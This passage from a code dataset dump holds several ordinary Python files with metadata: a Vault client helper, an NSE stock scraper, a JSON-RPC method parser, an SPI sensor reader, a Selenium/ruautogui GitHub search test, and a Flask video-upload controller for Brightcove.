'r').read().strip()\n else:\n raise aomi.exceptions.AomiCredentials('unknown method')\n\n\ndef token_meta(operation, opt):\n \"\"\"Generates metadata for a token\"\"\"\n meta = {\n 'via': 'aomi',\n 'operation': operation,\n 'hostname': socket.gethostname()\n }\n if 'USER' in os.environ:\n meta['unix_user'] = os.environ['USER']\n\n if opt.metadata:\n meta_bits = opt.metadata.split(',')\n for meta_bit in meta_bits:\n key, value = meta_bit.split('=')\n\n if key not in meta:\n meta[key] = value\n\n for key, value in meta.items():\n log(\"Token metadata %s %s\" % (key, value), opt)\n\n return meta\n\n\ndef operational_token(vault_client, operation, opt):\n \"\"\"Return a properly annotated token for our use.\"\"\"\n display_name = vault_client.lookup_token()['data']['display_name']\n args = {\n 'lease': opt.lease,\n 'display_name': display_name,\n 'meta': token_meta(operation, opt)\n }\n try:\n token = vault_client.create_token(**args)\n except (hvac.exceptions.InvalidRequest,\n hvac.exceptions.Forbidden) as vault_exception:\n if vault_exception.errors[0] == 'permission denied':\n error_output(\"Permission denied creating operational token\", opt)\n else:\n raise\n\n log(\"Using lease of %s\" % opt.lease, opt)\n return token['auth']['client_token']\n\n\ndef client(operation, opt):\n \"\"\"Return a vault client\"\"\"\n if 'VAULT_ADDR' not in os.environ:\n raise aomi.exceptions.AomiError('VAULT_ADDR must be defined')\n\n vault_host = os.environ['VAULT_ADDR']\n\n ssl_verify = True\n if 'VAULT_SKIP_VERIFY' in os.environ:\n if os.environ['VAULT_SKIP_VERIFY'] == '1':\n log('Skipping SSL Validation!', opt)\n ssl_verify = False\n\n log(\"Connecting to %s\" % vault_host, opt)\n vault_client = hvac.Client(vault_host, verify=ssl_verify)\n vault_client.token = initial_token(vault_client, opt)\n if not vault_client.is_authenticated():\n raise aomi.exceptions.AomiCredentials('initial token')\n\n if opt.reuse_token:\n log(\"Not creating operational token\", opt)\n else:\n vault_client.token = operational_token(vault_client, operation, opt)\n if not vault_client.is_authenticated():\n raise aomi.exceptions.AomiCredentials('operational token')\n\n return vault_client\n\n\ndef get_secretfile(opt):\n \"\"\"Renders, YAMLs, and returns the Secretfile 
construct\"\"\"\n secretfile_path = abspath(opt.secretfile)\n obj = merge_dicts(load_var_files(opt),\n cli_hash(opt.extra_vars))\n return yaml.safe_load(render(secretfile_path, obj))\n\n\ndef app_id_name(app_obj):\n \"\"\"Determines the proper app id name\"\"\"\n name = None\n if 'name' in app_obj:\n name = app_obj['name']\n else:\n name = os.path.splitext(os.path.basename(app_obj['app_file']))[0]\n\n return name\n", "sub_path": "aomi/vault.py", "file_name": "vault.py", "file_ext": "py", "file_size_in_byte": 5856, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.packages.urllib3.disable_warnings", "line_number": 17, "usage_type": "call"}, {"api_name": "requests.packages.urllib3.exceptions.InsecureRequestWarning", "line_number": 17, "usage_type": "argument"}, {"api_name": "requests.packages", "line_number": 17, "usage_type": "attribute"}, {"api_name": "aomi.helpers.exceptions.AomiCredentials", "line_number": 26, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions", "line_number": 26, "usage_type": "attribute"}, {"api_name": "aomi.helpers", "line_number": 26, "usage_type": "name"}, {"api_name": "aomi.helpers.exceptions.AomiCredentials", "line_number": 35, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions", "line_number": 35, "usage_type": "attribute"}, {"api_name": "aomi.helpers", "line_number": 35, "usage_type": "name"}, {"api_name": "aomi.util.appid_file", "line_number": 41, "usage_type": "call"}, {"api_name": "aomi.util.token_file", "line_number": 42, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}, {"api_name": "aomi.helpers.log", "line_number": 44, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 51, "usage_type": "attribute"}, {"api_name": "aomi.helpers.log", "line_number": 52, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 54, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 59, "usage_type": "attribute"}, {"api_name": "aomi.helpers.log", "line_number": 60, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 63, "usage_type": "call"}, {"api_name": "aomi.helpers.log", "line_number": 68, "usage_type": "call"}, {"api_name": "aomi.helpers.log", "line_number": 71, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions.AomiCredentials", "line_number": 74, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions", "line_number": 74, "usage_type": "attribute"}, {"api_name": "aomi.helpers", "line_number": 74, "usage_type": "name"}, {"api_name": "socket.gethostname", "line_number": 82, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 85, "usage_type": "attribute"}, {"api_name": "aomi.helpers.log", "line_number": 96, "usage_type": "call"}, {"api_name": "hvac.exceptions", "line_number": 111, 
"usage_type": "attribute"}, {"api_name": "hvac.exceptions", "line_number": 112, "usage_type": "attribute"}, {"api_name": "aomi.error.output", "line_number": 114, "usage_type": "call"}, {"api_name": "aomi.helpers.log", "line_number": 118, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 124, "usage_type": "attribute"}, {"api_name": "aomi.helpers.exceptions.AomiError", "line_number": 125, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions", "line_number": 125, "usage_type": "attribute"}, {"api_name": "aomi.helpers", "line_number": 125, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 127, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 131, "usage_type": "attribute"}, {"api_name": "aomi.helpers.log", "line_number": 132, "usage_type": "call"}, {"api_name": "aomi.helpers.log", "line_number": 135, "usage_type": "call"}, {"api_name": "hvac.Client", "line_number": 136, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions.AomiCredentials", "line_number": 139, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions", "line_number": 139, "usage_type": "attribute"}, {"api_name": "aomi.helpers", "line_number": 139, "usage_type": "name"}, {"api_name": "aomi.helpers.log", "line_number": 142, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions.AomiCredentials", "line_number": 146, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions", "line_number": 146, "usage_type": "attribute"}, {"api_name": "aomi.helpers", "line_number": 146, "usage_type": "name"}, {"api_name": "aomi.helpers.abspath", "line_number": 153, "usage_type": "call"}, {"api_name": "aomi.helpers.merge_dicts", "line_number": 154, "usage_type": "call"}, {"api_name": "aomi.template.load_var_files", "line_number": 154, "usage_type": "call"}, {"api_name": "aomi.helpers.cli_hash", "line_number": 155, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 156, "usage_type": "call"}, {"api_name": "aomi.template.render", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 165, "usage_type": "call"}]} +{"seq_id": "275513667", "text": "import re, time, openpyxl\r\nfrom datetime import datetime as dt\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.common.exceptions import TimeoutException\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\n\r\nworkbook = openpyxl.load_workbook('NSE.xlsx')\r\nquotes_sheet = workbook.get_sheet_by_name('QUOTES')\r\nquotes = []\r\ndateRegEx = re.compile(r'\\d{2}-\\d{2}-\\d{4}')\r\n\r\nfor row_num in range(2, quotes_sheet.max_row+1):\r\n stock = quotes_sheet.cell(row=row_num, column=1).value\r\n if stock:\r\n stock = str(stock).strip()\r\n if (stock != '') and (len(stock) < 6):\r\n start_date = str(quotes_sheet.cell(row=row_num, column=2).value)\r\n match = dateRegEx.search(start_date)\r\n if not match:\r\n print(\"Start date is incorrect for '\" + stock +\r\n \"'. Please provide the correct date in the format of DD-MM-YYYY.\")\r\n else:\r\n end_date = str(quotes_sheet.cell(row=row_num, column=3).value)\r\n match = dateRegEx.search(end_date)\r\n if not match:\r\n print(\"End date is incorrect for '\" + stock +\r\n \"'. 
Please provide the correct date in the format of DD-MM-YYYY.\")\r\n else:\r\n try:\r\n start_dt = dt(int(start_date[6:]), int(start_date[3:5]), int(start_date[:2]))\r\n end_dt = dt(int(end_date[6:]), int(end_date[3:5]), int(end_date[:2]))\r\n if start_dt <= end_dt <= dt.now():\r\n quotes.append((stock, start_date, end_date))\r\n else:\r\n print(\"For '\" + stock + \"', the start date cannot be greater than end date and also the end \"\r\n \"date cannot be greater than today's date.\")\r\n except:\r\n print(\"The date seems to be incorrect.\")\r\n\r\nprint('~'*100)\r\nif quotes:\r\n print(\"The script will execute for the following stock tickers.\")\r\n print(quotes)\r\nelse:\r\n print(\"Cannot execute the script. Need proper data to search for...\")\r\nprint('~'*100)\r\n\r\nbrowser = webdriver.Chrome()\r\nbrowser.get(\"https://www.nseindia.com/products/content/equities/equities/eq_security.htm\")\r\nfor quote in quotes:\r\n browser.find_element_by_id('symbol').clear()\r\n browser.find_element_by_id('symbol').send_keys(quote[0])\r\n browser.find_element_by_id('rdDateToDate').click()\r\n browser.find_element_by_id('fromDate').clear()\r\n browser.find_element_by_id('fromDate').send_keys(quote[1])\r\n browser.find_element_by_id('toDate').clear()\r\n browser.find_element_by_id('toDate').send_keys(quote[2])\r\n browser.find_element_by_id('get').click()\r\n try:\r\n WebDriverWait(browser, 30).until(EC.element_to_be_clickable((By.CSS_SELECTOR,\r\n \"span[class='download-data-link']\")))\r\n num_of_rows = len(browser.find_elements_by_xpath(\".//*[@id='historicalData']/table/tbody/tr\")) - 1\r\n num_of_columns = len(browser.find_elements_by_xpath(\".//*[@id='historicalData']/table/tbody/tr[1]/th\"))\r\n print(num_of_columns, num_of_rows)\r\n time.sleep(5)\r\n try:\r\n workbook.get_sheet_by_name(quote[0])\r\n except KeyError:\r\n workbook.create_sheet(quote[0])\r\n print(\"Created a new sheet for \" + quote[0])\r\n active_sheet = workbook.get_sheet_by_name(quote[0])\r\n last_row = active_sheet.max_row + 1\r\n active_sheet.cell(row=last_row, column=1).value = \"For date range: \" + quote[1] + \" ~ \" + quote[2]\r\n if last_row < 3:\r\n for h in range(num_of_columns):\r\n h += 1\r\n data = browser.find_element_by_xpath(\".//*[@id='historicalData']/table/tbody/tr[1]/th[%d]\" % (h)).text\r\n active_sheet.cell(row=1, column=h).value = data\r\n for c in range(num_of_columns):\r\n c += 1\r\n r = 1\r\n new_row = last_row\r\n for k in range(num_of_rows):\r\n r += 1\r\n data = browser.find_element_by_xpath(\r\n \".//*[@id='historicalData']/table/tbody/tr[%d]/td[%d]\" % (r, c)).text\r\n new_row += 1\r\n active_sheet.cell(row=new_row, column=c).value = data\r\n workbook.save('NSE.xlsx')\r\n except:\r\n print(\"Browser is taking too much time to load the table for \" + quote[0] + '.')\r\n workbook.save('NSE.xlsx')\r\nprint(\"All done.\")\r\n", "sub_path": "NSE Security-wise Price Volume Archives/nse.py", "file_name": "nse.py", "file_ext": "py", "file_size_in_byte": 4675, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "openpyxl.load_workbook", "line_number": 9, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 34, 
"usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 50, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 50, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 62, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 62, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 62, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 62, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 62, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "625663510", "text": "# -*- coding: utf-8 -*-\nimport functools\nimport re\nimport reprlib\nfrom collections import namedtuple\n\nimport structlog\n\nfrom .errors import InvalidNamespaceAPIError\nfrom .errors import InvalidNamespaceError\n\nlogger = structlog.get_logger(__name__)\n\nJRPC_METHOD_PATTERN = r'(^(?P[^\\.]+_api)\\.(?P[^\\.]+)$)|^(?P^[^\\.]+)$|^(?P[^\\.]+){1}\\.(?:(?P[^\\.]+)\\.){0,1}(?P[^\\.]+){1}$'\nJRPC_METHOD_REGEX = re.compile(JRPC_METHOD_PATTERN)\n\n\nSTEEMD_NUMERIC_API_MAPPING = ('database_api', 'login_api')\n\n\nclass URN(namedtuple('URN', 'namespace api method params')):\n __cached_str = None\n\n @classmethod\n def from_request(cls, single_jsonrpc_request: dict):\n parsed = URN._parse_jrpc(single_jsonrpc_request)\n if isinstance(parsed['params'], dict):\n parsed['params'] = dict(sorted(parsed['params'].items()))\n\n return URN(namespace=parsed['namespace'],\n api=parsed['api'],\n method=parsed['method'],\n params=parsed['params'])\n\n # pylint: disable=no-member\n\n @staticmethod\n @functools.lru_cache(8192)\n def _parse_jrpc_method(jrpc_method: str) -> dict:\n return JRPC_METHOD_REGEX.match(jrpc_method).groupdict(default=False)\n\n # pylint: disable=too-many-branches\n @staticmethod\n def _parse_jrpc(single_jsonrpc_request: dict):\n try:\n method = single_jsonrpc_request['method']\n params = single_jsonrpc_request.get('params', False)\n\n matched = URN._parse_jrpc_method(method)\n\n if matched.get('appbase_api'):\n return {\n 'namespace': 'appbase',\n 'api': matched['appbase_api'],\n 'method': matched['appbase_method'],\n 'params': params\n }\n if matched.get('namespace'):\n if matched['namespace'] == 'jsonrpc':\n return {\n 'namespace': 'appbase',\n 'api': 'jsonrpc',\n 'method': matched['method'],\n 'params': params\n }\n return {\n 'namespace': matched['namespace'],\n 'api': matched.get('api'),\n 'method': matched['method'],\n 'params': params\n }\n if matched['bare_method']:\n method = matched['bare_method']\n\n if method != 'call':\n return {\n 'namespace': 'steemd',\n 'api': 'database_api',\n 'method': method,\n 'params': params\n }\n\n if len(params) != 3:\n namespace = 'appbase'\n api, method = params\n _params = False\n else:\n api, method, _params = params\n if api == 'condenser_api' or isinstance(_params, dict) or api == 'jsonrpc':\n namespace = 'appbase'\n else:\n namespace = 'steemd'\n if isinstance(api, int):\n try:\n api = STEEMD_NUMERIC_API_MAPPING[api]\n except IndexError:\n raise InvalidNamespaceAPIError(namespace='steemd',\n api=api)\n\n return {\n 'namespace': namespace,\n 'api': api,\n 'method': method,\n 'params': _params\n }\n else:\n logger.error('failed to parse request method', extra={'matched': matched,\n 'params': params})\n raise 
InvalidNamespaceError(namespace=single_jsonrpc_request['method'])\n        except InvalidNamespaceAPIError as e:\n            raise e\n        except InvalidNamespaceError as e:\n            raise e\n        except Exception as e:\n            raise InvalidNamespaceError(namespace=single_jsonrpc_request['method'])\n    # pylint: enable=too-many-branches\n\n    def __repr__(self):\n        return f'URN(namespace={self.namespace}, api={self.api}, method={self.method}, params={reprlib.repr(self.params)})'\n\n    def __str__(self):\n        if self.__cached_str:\n            return self.__cached_str\n        params = self.params\n        if self.params is not False:\n            params = f'params={self.params}'.replace(' ', '')\n\n        api = self.api\n        if api is not False:\n            api = str(self.api)\n        self.__cached_str = '.'.join(\n            p for p in (\n                self.namespace,\n                api,\n                self.method,\n                params) if p is not False)\n        return self.__cached_str\n\n    def __hash__(self):\n        return hash(str(self))\n\n    def __eq__(self, urn):\n        return hash(urn) == hash(self)\n", "sub_path": "jussi/urn.py", "file_name": "urn.py", "file_ext": "py", "file_size_in_byte": 5072, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "structlog.get_logger", "line_number": 12, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 15, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 21, "usage_type": "call"}, {"api_name": "functools.lru_cache", "line_number": 38, "usage_type": "call"}, {"api_name": "errors.InvalidNamespaceAPIError", "line_number": 97, "usage_type": "call"}, {"api_name": "errors.InvalidNamespaceError", "line_number": 109, "usage_type": "call"}, {"api_name": "errors.InvalidNamespaceAPIError", "line_number": 110, "usage_type": "name"}, {"api_name": "errors.InvalidNamespaceError", "line_number": 112, "usage_type": "name"}, {"api_name": "errors.InvalidNamespaceError", "line_number": 115, "usage_type": "call"}, {"api_name": "reprlib.repr", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "92157192", "text": "import time\nimport spidev\nimport struct\nimport random\nfrom collections import deque\nimport math\nimport hashlib\n\nfrom .struct_package import columns\n\n\ndef get_test_data():\n    return [random.randint(0, 3000) for i in range(len(columns))]\n\n\ndef hash_for(data_pack):\n    hashId = hashlib.sha256()\n\n    hashId.update(data_pack)\n\n    return hashId.digest()\n\n\nclass MimState:\n    def __init__(self, size_lifo=100, time_update=1000):\n        self.spi = spidev.SpiDev()\n        self.spi.open(0, 1)\n        self.spi.max_speed_hz = 600000\n\n        self.status = 'test'\n\n        self.last_time = 0\n        self.size_lifo = size_lifo\n        self.time_update = time_update\n        self.state_dict = None\n\n        self.lifo_dict = dict([(key, deque([0 for i in range(self.size_lifo)])) for key in columns])\n\n    def get_package(self):\n        while True:\n\n            one_byte = self.spi.readbytes(1)[0]\n            if one_byte != 0:\n                byte_pack = self.spi.readbytes(72)\n                hash_out = bytes(self.spi.readbytes(32))\n\n                byte_pack = bytes(byte_pack)\n                pack = struct.unpack('f' * 18, byte_pack)\n\n                if hash_out == hash_for(byte_pack):\n                    d = dict([(k, v) for k, v in zip(columns, pack[1:])])\n                    return d\n\n    def update_state(self):\n        try:\n            self.state_dict = self.get_package()\n        except (KeyError, IndexError, StopIteration) as e:\n            self.state_dict = dict()\n\n        for key in columns:\n            self.lifo_dict[key].popleft()\n            self.lifo_dict[key].append(\n                float(self.state_dict.get(key, 0.1))\n            )\n\n    def get_value(self, key):\n        \"\"\"\n        Get the buffered time-series values for a key\n        :param key:\n        :return:\n        \"\"\"\n        return list(self.lifo_dict[key])\n\n    def update_status(self, status):\n        \"\"\"\n        Updates the walking status in the DB\n        \"\"\"\n        self.status = status\n", "sub_path": "dash/src/pyboard.py", "file_name": "pyboard.py", "file_ext": "py", "file_size_in_byte": 2027, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "random.randint", "line_number": 13, "usage_type": "call"}, {"api_name": "struct_package.columns", "line_number": 13, "usage_type": "argument"}, {"api_name": "hashlib.sha256", "line_number": 17, "usage_type": "call"}, {"api_name": "spidev.SpiDev", "line_number": 26, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 37, "usage_type": "call"}, {"api_name": "struct_package.columns", "line_number": 37, "usage_type": "name"}, {"api_name": "struct.unpack", "line_number": 48, "usage_type": "call"}, {"api_name": "struct_package.columns", "line_number": 51, "usage_type": "argument"}, {"api_name": "struct_package.columns", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "417877587", "text": "from selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options as ChromeOptions\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom ruautogui import keyboard as kb \nfrom ruautogui import mouse as ms \nimport sys, random, time\n\nchrome_options = ChromeOptions()\nchrome_options.add_experimental_option('useAutomationExtension', False)\nchrome_options.add_experimental_option('excludeSwitches', ['enable-automation'])\ndriver = Chrome(options=chrome_options)\n\ndriver.get('https://github.com')\nkb.press('f11') # Browser full-screen mode\ntry:\n    input_field = WebDriverWait(driver, 10).until(\n        EC.presence_of_element_located((By.XPATH, \"//input[contains(@class, 'form-control')]\"))\n    )\nexcept Exception as exc:\n    print('Unable to find the input field...')\n    driver.quit()\n    sys.exit()\n\n# input_field is a Selenium object, in this case the web element\n# representing the search input field on github.com\ninput_field = driver.find_element_by_xpath(\"//input[contains(@class, 'form-control')]\")\n\nms.grab() # simulate grabbing the mouse with the hand.\ntime.sleep(1)\n\n# field_location is a tuple with the web element's coordinates in the browser window.\n# The coordinates are the top-left point of the element.\nfield_location = (input_field.location['x'], input_field.location['y'])\n# field_size is a tuple of the element's width and height in the browser window.\nfield_size = (input_field.size['width'], input_field.size['height'])\n\n# target_loc is used as a tuple of random coordinates inside the web element.\ntarget_loc = (\n    field_location[0] + random.randint(field_size[0] // 4, field_size[0] // 2),\n    field_location[1] + random.randint(field_size[1] // 4, field_size[1] // 2)\n)\n\nms.move(end_pos=target_loc, order=4) # Move the mouse cursor into the input field area.\ntime.sleep(1)\nms.click() # Left-click on the input field.\ntime.sleep(1)\nkb.type('ruautogui', mode='standard', typo=True) # Type the text 'ruautogui' on the keyboard\ntime.sleep(1)\nkb.press('enter') # Press the Enter key on the keyboard.\ntime.sleep(5)\ndriver.quit()", "sub_path": "tests/test_selenium.py", "file_name": "test_selenium.py", "file_ext": "py", "file_size_in_byte": 2607, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": 
"selenium.webdriver.chrome.options.Options", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 13, "usage_type": "call"}, {"api_name": "ruautogui.keyboard.press", "line_number": 16, "usage_type": "call"}, {"api_name": "ruautogui.keyboard", "line_number": 16, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 18, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 19, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 19, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 19, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 19, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 24, "usage_type": "call"}, {"api_name": "ruautogui.mouse.grab", "line_number": 30, "usage_type": "call"}, {"api_name": "ruautogui.mouse", "line_number": 30, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 41, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 42, "usage_type": "call"}, {"api_name": "ruautogui.mouse.move", "line_number": 45, "usage_type": "call"}, {"api_name": "ruautogui.mouse", "line_number": 45, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 46, "usage_type": "call"}, {"api_name": "ruautogui.mouse.click", "line_number": 47, "usage_type": "call"}, {"api_name": "ruautogui.mouse", "line_number": 47, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "ruautogui.keyboard.type", "line_number": 49, "usage_type": "call"}, {"api_name": "ruautogui.keyboard", "line_number": 49, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 50, "usage_type": "call"}, {"api_name": "ruautogui.keyboard.press", "line_number": 51, "usage_type": "call"}, {"api_name": "ruautogui.keyboard", "line_number": 51, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "549202388", "text": "import os, requests, time, boto3\nfrom requests.auth import HTTPBasicAuth\nfrom flask import Blueprint, request, render_template, flash\nfrom werkzeug.utils import secure_filename\nfrom app import app\nfrom app.main.forms import UploadForm\n\nmain = Blueprint('main', __name__, url_prefix='')\n\n\n@main.route('/', methods=['GET', 'POST'])\ndef upload():\n form = UploadForm(request.form)\n\n if request.method == 'POST' and 'video' in request.files:\n f = request.files['video']\n filename = secure_filename(f.filename)\n f.save(os.path.join(\n app.root_path, 'static/videos', filename\n ))\n\n flash(\"Video file uploaded - \" + filename, 'success')\n\n title = form.title.data\n desc = form.description.data\n url = app.root_path + '/static/videos/' + filename\n\n token = auth()\n\n flash('Authenticated', 'success')\n\n headers = {'Authorization': 'Bearer ' + token}\n\n r = requests.post('https://cms.api.brightcove.com/v1/accounts/' + app.config['VC_ACCOUNT'] + '/videos',\n json={\"name\": title, \"long_description\": desc, \"state\": \"INACTIVE\"}, headers=headers)\n json = r.json()\n\n if r.status_code > 399:\n flash('Error: ' + json['message'], 'danger')\n return render_template('main/upload.html', form=form)\n else:\n vid = json['id']\n flash('Video ' + vid + ' - record created', 'success')\n\n r = 
requests.get('https://ingest.api.brightcove.com/v1/accounts/' + app.config['VC_ACCOUNT'] + '/videos/' + vid + '/upload-urls/' + title, headers=headers)\n json = r.json()\n\n s3 = boto3.resource('s3',\n aws_access_key_id=json['access_key_id'],\n aws_secret_access_key=json['secret_access_key'],\n aws_session_token=json['session_token'])\n\n s3.Object(json['bucket'], json['object_key']).upload_file(url)\n\n r = requests.post('https://ingest.api.brightcove.com/v1/accounts/' + app.config['VC_ACCOUNT'] + '/videos/' + vid + '/ingest-requests',\n json={\"master\": {\"url\": json['api_request_url']}}, headers=headers)\n json = r.json()\n flash('Ingest job ' + json['id'] + ' started', 'info')\n\n\n return render_template('main/upload.html', form=form)\n\n\ndef auth():\n token_file = os.path.join(app.root_path, 'static/data', 'token.txt')\n\n if os.path.isfile(token_file):\n file = open(token_file, 'r')\n d = file.read()\n token, ttime = d.split(',')\n now = int(time.time())\n ttime = int(ttime)\n if now < (ttime + 300):\n print ('true')\n return token\n else:\n token = login(token_file)\n return token\n else:\n token = login(token_file)\n return token\n\n\ndef login(token_file):\n data = {'grant_type': 'client_credentials'}\n r = requests.post('https://oauth.brightcove.com/v3/access_token', data,\n auth=HTTPBasicAuth(app.config['VC_API_ID'], app.config['VC_API_SECRET']))\n\n json = r.json()\n token = json['access_token']\n file = open(token_file, 'w')\n file.write(token + ',' + str(int(time.time())))\n file.close()\n return token\n", "sub_path": "app/main/controllers.py", "file_name": "controllers.py", "file_ext": "py", "file_size_in_byte": 3310, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Blueprint", "line_number": 8, "usage_type": "call"}, {"api_name": "app.main.forms.UploadForm", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 13, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request.files", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "werkzeug.utils.secure_filename", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "app.app.root_path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 22, "usage_type": "call"}, {"api_name": "app.app.root_path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 30, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 34, "usage_type": "call"}, {"api_name": "app.app.config", "line_number": 34, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 
43, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 45, "usage_type": "call"}, {"api_name": "app.app.config", "line_number": 45, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 45, "usage_type": "name"}, {"api_name": "boto3.resource", "line_number": 48, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 55, "usage_type": "call"}, {"api_name": "app.app.config", "line_number": 55, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "app.app.root_path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 65, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 71, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 86, "usage_type": "call"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 87, "usage_type": "call"}, {"api_name": "app.app.config", "line_number": 87, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 87, "usage_type": "name"}, {"api_name": "time.time", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "625118629", "text": 